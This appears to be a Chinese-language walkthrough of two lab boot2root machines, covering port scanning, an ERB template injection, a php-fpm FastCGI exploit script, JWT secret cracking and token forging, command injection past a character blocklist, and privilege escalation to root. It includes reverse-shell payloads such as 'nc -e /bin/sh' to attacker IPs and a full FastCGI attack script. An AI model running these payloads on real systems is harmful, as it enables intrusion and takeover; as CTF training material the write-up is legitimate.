Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:48 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00010s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
MAC Address: 00:0C:29:82:76:43 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

开了22 和 3000端口，nmap -sV 扫详细服务

nmap -sV  10.20.73.121 -p3000,22

┌──(root㉿kali)-[~]
└─# nmap -sV  10.20.73.121 -p3000,22
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:49 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00031s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
3000/tcp open  ssl/ppp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%T=SSL%I=7%D=9/16%Time=66E7E361%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,3EF,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Len
SF:gth:\x20930\r\n\r\nPuma\x20caught\x20this\x20error:\x20Invalid\x20HTTP\
SF:x20format,\x20parsing\x20fails\.\x20Are\x20you\x20trying\x20to\x20open\
SF:x20an\x20SSL\x20connection\x20to\x20a\x20non-SSL\x20Puma\?\x20\(Puma::H
SF:ttpParserError\)\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/li
SF:b/puma/client\.rb:268:in\x20`execute'\n/usr/local/rvm/gems/ruby-3\.1\.0
SF:/gems/puma-6\.4\.2/lib/puma/client\.rb:268:in\x20`try_to_finish'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/server\.rb:298:i
SF:n\x20`reactor_wakeup'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\
SF:.2/lib/puma/server\.rb:248:in\x20`block\x20in\x20run'\n/usr/local/rvm/g
SF:ems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:119:in\x20`wake
SF:up!'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/react
SF:or\.rb:76:in\x20`block\x20in\x20select_loop'\n/usr/local/rvm/gems/ruby-
SF:3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:in\x20`select'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:i
SF:n\x20`select_loop'\n/usr/loc")%r(GetRequest,169E,"HTTP/1\.0\x20403\x20F
SF:orbidden\r\ncontent-type:\x20text/html;\x20charset=UTF-8\r\nContent-Len
SF:gth:\x205702\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n
SF:\x20\x20<meta\x20charset=\"utf-8\"\x20/>\n\x20\x20<meta\x20name=\"viewp
SF:ort\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\x20\x20<
SF:meta\x20name=\"turbo-visit-control\"\x20content=\"reload\">\n\x20\x20<t
SF:itle>Action\x20Controller:\x20Exception\x20caught</title>\n\x20\x20<sty
SF:le>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20background-colo
SF:r:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n\x20\x20\x20\x
SF:20\x20\x20color-scheme:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20supp
SF:orted-color-schemes:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20margin:
SF:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x20ul
SF:,\x20td\x20{\n\x20\x20\x20\x20\x20\x20font-family:\x20helvetica,\x20ver
SF:dana,\x20arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x20\
SF:x20\x2013px;\n\x20\x20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x20\x
SF:20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-size:
SF:\x2011px;\n\x20\x20\x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x20\
SF:x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20bord
SF:er:\x201px\x20solid\x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010px;
SF:\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20widt
SF:h:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20\x2
SF:0\x20\x20\x20\x20color:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20background
SF::\x20#C00;\n\x20\x20\x20\x20\x20\x20padding:");
MAC Address: 00:0C:29:82:76:43 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.17 seconds

看到了ssl，尝试使用https访问

漏洞发现

web打点

查看这五个链接，如图所示，这五个链接都是黑客工具

接下来测试下面的输入框

随意输入内容提示Product does not exist

发现这串字符串就是message的参数，修改message为123查看

提示的字符变成了123，这边很明显有一个xss漏洞

不过并没什么用

查看网站变成语言，是ruby

Ruby/ERB ssti

经过搜索，这里是ERB的ssti，可用使用<%= (ruby代码) %>模板来执行命名

测试一下，将<%= 7*7 %>url编码传入

输入了49，说名存在漏洞

尝试反弹shell

构造反弹shell命令

<%= system("nc -e /bin/sh 10.20.73.233 5555"); %>

有pyhton ，使用python开一下虚拟终端

python3 -c "import pty;pty.spawn('/bin/bash')"

提权

在本地开了一个80，9000端口，将这两个端口转发出来

lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 & 
<CP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 & 
[1] 1281
lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 & 
< TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 & 
[2] 1282
lidia@hacktoys:/tmp$ ss -nltp 
ss -nltp 
State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess                         
LISTEN 0      5            0.0.0.0:8080      0.0.0.0:*    users:(("socat",pid=1282,fd=5))
LISTEN 0      511        127.0.0.1:80        0.0.0.0:*                                   
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*                                   
LISTEN 0      4096       127.0.0.1:9000      0.0.0.0:*                                   
LISTEN 0      1024         0.0.0.0:3000      0.0.0.0:*    users:(("ruby",pid=593,fd=7))  
LISTEN 0      5            0.0.0.0:9001      0.0.0.0:*    users:(("socat",pid=1281,fd=5))
LISTEN 0      128             [::]:22           [::]:*                                                                

访问转发出来的 80端口

测了半天也找到什么漏洞

转移目标至9000端口

发现靶机进程中有php-fpm，它的默认端口正好是9000

https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi

在网上找到大佬的的脚本可以直接命令执行

改个端口和路径就能直接打

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT

    cat $OUTPUT
done

发现使用dodi用户，直接反弹shell提权至该用户

提权至dodi

修改执行的命令

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('nc -e /bin/bash 10.20.73.233 6666'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT

    cat $OUTPUT
done

提权至root

sudo -l 发现该用户可以使用sudo运行/usr/local/bin/rvm_rails.sh这个脚本

运行脚本

dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
sudo /usr/local/bin/rvm_rails.sh
Usage:
  rails COMMAND [options]

You must specify a command:

  new          Create a new Rails application. "rails new my_app" creates a
               new application called MyApp in "./my_app"
  plugin new   Create a new Rails railtie or engine

All commands can be run with -h (or --help) for more information.

Inside a Rails application directory, some common commands are:

  console      Start the Rails console
  server       Start the Rails server
  test         Run tests except system tests

发现是rails

Rails 是使用Ruby 语言编写的网页程序开发框架

分析脚本

#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"

脚本之后执行了/usr/local/rvm/gems/ruby-3.1.0/bin/rails这个文件

dodi@hacktoys:/var/www/html$ cat /etc/group | grep rvm
cat /etc/group | grep rvm
rvm:x:1002:lidia,root

lidia用户对该文件有修改权限，使用该用户在这个文件中写入/bin/bash即可提权

lidia@hacktoys:/tmp$ echo "/bin/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
<in/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
lidia@hacktoys:/tmp$ 

dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
sudo /usr/local/bin/rvm_rails.sh
root@hacktoys:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root),1002(rvm)

1.1.目标发现

使用virtualbox导入靶机并打开

发现靶机的ip是10.177.246.54

1.2.端口信息扫描

使用nmap扫描目标ip的所有端口信息

┌──(root㉿kali)-[~]
└─# nmap -sS -sV  10.177.246.54 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 06:41 EDT
Nmap scan report for 10.177.246.54
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
3000/tcp open  http    Node.js Express framework
MAC Address: 08:00:27:73:80:C0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.98 seconds

发现目标ip开了22和3000端口

3000端口是nodejs写的后端

2.漏洞发现

2.1.查看目标ip的3000端口

显示Cannot GET / 不能使用get

用hackbar改成post再次进行访问

还是显示Cannot POST / 不能使用post

2.2.网站爆破

使用ffuf工具对网站进行爆破

┌──(root㉿kali)-[~]
└─# ffuf -w /root/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.177.246.54:3000/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.177.246.54:3000/FUZZ
 :: Wordlist         : FUZZ: /root/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

:: Progress: [220560/220560] :: Job [1/1] :: 5882 req/sec :: Duration: [0:00:40] :: Errors: 0 ::

发现使用get方式没有爆破出来

尝试使用post爆破

┌──(root㉿kali)-[~]
└─# ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt  -X POST  -fc 404 -mc all -u http://10.177.246.54:3000/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://10.177.246.54:3000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response status: 404
________________________________________________

[Status: 401, Size: 22, Words: 2, Lines: 1, Duration: 27ms]
    * FUZZ: login

[Status: 400, Size: 29, Words: 6, Lines: 1, Duration: 25ms]
    * FUZZ: register

[Status: 401, Size: 12, Words: 1, Lines: 1, Duration: 7ms]
    * FUZZ: execute

:: Progress: [207643/207643] :: Job [1/1] :: 4761 req/sec :: Duration: [0:00:38] :: Errors: 0 ::

扫描到了三个路径

使用curl查看这三个路径

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/login    
Identifiants invalides                                                                                                                                            
┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/register
The "role" field is not valid                                                                                                                                            
┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/execute
Unauthorized            

2.3.register字段爆破

┌──(root㉿kali)-[~]
└─# ffuf -w SecLists-master/Discovery/Web-Content/api/objects.txt -X POST -u http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"FUZZ"}'

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://10.177.246.54:3000/register
 :: Wordlist         : FUZZ: /root/SecLists-master/Discovery/Web-Content/api/objects.txt
 :: Header           : Content-Type: application/json
 :: Data             : {"role":"FUZZ"}
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 401, Size: 16, Words: 3, Lines: 1, Duration: 30ms]
    * FUZZ: admin

[Status: 500, Size: 32, Words: 5, Lines: 1, Duration: 41ms]
    * FUZZ: user

:: Progress: [3132/3132] :: Job [1/1] :: 1234 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

爆破出admin和user两个字段

使用curl测试

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"admin"}'
Not authorized !      

访问admin字段返回Not authorized ! 未授权

尝试访问user字段

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user"}' 
Column 'username' cannot be null                                                                                                                                   

返回Column 'username' cannot be null username字段不能空

添加username字段测试

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user","username":"user"}'
Column 'password' cannot be null 

显示Column 'password' cannot be null password字段不能为空

添加password字段测试

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user","username":"user","password":"user"}'
Registration OK 

发现注册成功了

2.4.登录

尝试使用curl登录

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/login -H "Content-Type: application/json" -d '{"role":"user","username":"user","password":"user"}'
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M"} 

登陆之后返回了一个token

3.漏洞利用

3.1.尝试使用返回的token执行命令

这里我们猜测获取命令的字段为cmd来测试

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M" -H "Content-Type: application/json"  -d '{"cmd":"id"}'
Not authorized

返回Not authorized 未授权

猜测只有admin用户才有权限执行命令

3.2.修改token为admin用户

这里我们用jwt.io这个网站来修改token

复制我们的token到这个网站

这里需要秘钥

使用john爆破

┌──(root㉿kali)-[~]
└─# echo eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M > user.hash
                                                                                                                                            
┌──(root㉿kali)-[~]
└─# john -w=rockyou.txt user.hash
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
nopassword       (?)     
1g 0:00:00:00 DONE (2023-05-10 08:20) 100.0g/s 1228Kp/s 1228Kc/s 1228KC/s total90..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

爆破出秘钥为nopassword

将username和role字段都改成admin

在下面填入秘钥

这样token就修改好了 复制这个token 尝试执行命令

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -H "Content-Type: application/json" -d '{"cmd":"id"}'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>TypeError [ERR_INVALID_ARG_TYPE]: The &quot;file&quot; argument must be of type string. Received undefined<br> &nbsp; &nbsp;at validateString (internal/validators.js:120:11)<br> &nbsp; &nbsp;at normalizeSpawnArguments (child_process.js:411:3)<br> &nbsp; &nbsp;at spawn (child_process.js:547:16)<br> &nbsp; &nbsp;at Object.execFile (child_process.js:237:17)<br> &nbsp; &nbsp;at exec (child_process.js:158:25)<br> &nbsp; &nbsp;at /opt/login-app/app.js:69:3<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/opt/login-app/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at next (/opt/login-app/node_modules/express/lib/router/route.js:144:13)<br> &nbsp; &nbsp;at /opt/login-app/app.js:112:5<br> &nbsp; &nbsp;at /opt/login-app/node_modules/jsonwebtoken/verify.js:261:12</pre>
</body>
</html>

获取命令的字段错了

3.3.爆破命令字段

┌──(root㉿kali)-[~]
└─# ffuf -w /root/SecLists-master/Discovery/Web-Content/api/objects.txt -u http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -X POST -H "Content-Type: application/json" -d '{"FUZZ":"id"}' -fc 500

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://10.177.246.54:3000/execute
 :: Wordlist         : FUZZ: /root/SecLists-master/Discovery/Web-Content/api/objects.txt
 :: Header           : Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk
 :: Header           : Content-Type: application/json
 :: Data             : {"FUZZ":"id"}
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 500
________________________________________________

[Status: 200, Size: 54, Words: 3, Lines: 2, Duration: 89ms]
    * FUZZ: command

:: Progress: [3132/3132] :: Job [1/1] :: 1869 req/sec :: Duration: [0:00:01] :: Errors: 0 ::

成功爆破出命令字段command

3.4.命令执行

使用curl执行命令

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -H "Content-Type: application/json" -d '{"command":"id"}'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

命令执行成功

接下来反弹shell

3.5.提权至doro用户

发现www用户可以使用doro用户的权限执行/home/doro/tools.py这个脚本

查看这个脚本权限发现只有读的权限

查看这个脚本

import os
import sys

def main():
    if len(sys.argv) < 2:
        print_help()
        return
    
    option = sys.argv[1]
    if option == "--ping":
        ping()
    elif option == "--traceroute":
        traceroute_ip()
    else:
        print("Invalid option.")
        print_help()

def print_help():
    print("Usage: python3 network_tool.py <option>")
    print("Options:")
    print("--ping           Ping an IP address")
    print("--traceroute     Perform a traceroute on an IP address")

def ping():
    ip_address = input("Enter an IP address: ")

    forbidden_chars = ["&", ";", "(", ")", "||", "|", ">", "<", "*", "?"]
    for char in forbidden_chars:
        if char in ip_address:
            print("Forbidden character found: {}".format(char))
            sys.exit(1)
    
    os.system('ping -c 2 ' + ip_address)

def traceroute_ip():
    ip_address = input("Enter an IP address: ")

    if not is_valid_ip(ip_address):
        print("Invalid IP address.")
        return
    
    traceroute_command = "traceroute {}".format(ip_address)
    os.system(traceroute_command)

def is_valid_ip(ip_address):
    octets = ip_address.split(".")
    if len(octets) != 4:
        return False
    for octet in octets:
        if not octet.isdigit() or int(octet) < 0 or int(octet) > 255:
            return False
    return True

if __name__ == "__main__":
    main()

发现脚本没有过滤"`"符号

可以绕过

首先使用nc监听本机的5555端口 用来反弹shell

使用doro用户的权限执行脚本

输入

`nc 10.177.246.51 5555 -e /bin/bash`

成功叫权限提升至doro

在doro家目录下的.ssh目录中发现了doro的公钥和私钥

将公钥的内容写入authorized_keys文件

复制私钥到本机并设置权限为600

这样我们就可以使用ssh登录doro用户了

3.6.提权至root

直接使用linpeas.sh辅助提权工具

在靶机运行linpeas.sh

发现screen有suid权限并且版本为4.5.0

此版本存在漏洞

使用searchsploit搜索提权脚本

将41154.sh上传至靶机

执行改脚本

成功提权至root

3.7.拿flag

flag1{ccd839df5504a7ace407b5aeca436e81}

flag2{052cf26a6e7e33790391c0d869e2e40c}